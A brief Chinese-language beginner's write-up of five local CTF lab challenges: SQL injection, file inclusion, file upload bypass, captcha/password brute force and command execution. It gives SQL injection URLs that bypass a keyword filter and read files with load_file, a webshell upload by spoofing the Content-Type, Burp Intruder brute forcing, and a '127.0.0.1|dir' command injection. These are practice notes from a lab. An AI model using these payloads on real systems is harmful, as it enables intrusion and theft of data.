CTF的sql注入、文件包含、文件上传突破等五道题

使用win7建立一个ctf的环境，在本地测试实验

新手练习，在网上找了很多的资料

 

1、sql注入

    http://192.168.232.128/test/0x1oa/vulnerabilities/fu1.php?id=1%%27)--+

http://192.168.232.128/test/0x1oa/vulnerabilities/fu1.php?id=1%%27)order%20by%204--+

http://192.168.232.128/test/0x1oa/vulnerabilities/fu1.php?id=a%%27)%20ununionion%20all%20select%201,2,3,@@datadir--+

http://192.168.232.128/test/0x1oa/vulnerabilities/fu1.php?id=a%%27)%20ununionion%20all%20select%201,2,3,load_file(%27c:\\flag.txt%27)--+

 

 

2、文件包含

 

 

查看页面源代码

对密文进行解密分析

抓包转发测试

更改菜刀config.ini文件

用菜刀去连接 区分大小写

 

 

 

3、文件上传突破

 

上传assert.php

抓包更改Content-Type的值为：image/png

上传成功

点击查看，触发assert.php

用菜刀连接

 

 

4、验证码爆破

对目标网站进行burp抓包

转发到indruder进行密码爆破

对爆破进行分析，错误的请求的length都为1984，爆破到一个请求的length值为1989，

使用这个123qwe去更改源数据包的password值

 

成功登陆拿到key

 

 

5、命令执行

使用127.0.0.1|dir 查看当前目录下的文件

查看ipconfig

查看key.php文件内容

对登陆进行抓包

更改127.0.0.1的值

查看原文件key.php

 

 

新手练习，如有错误，请各位大佬多多指教！！！！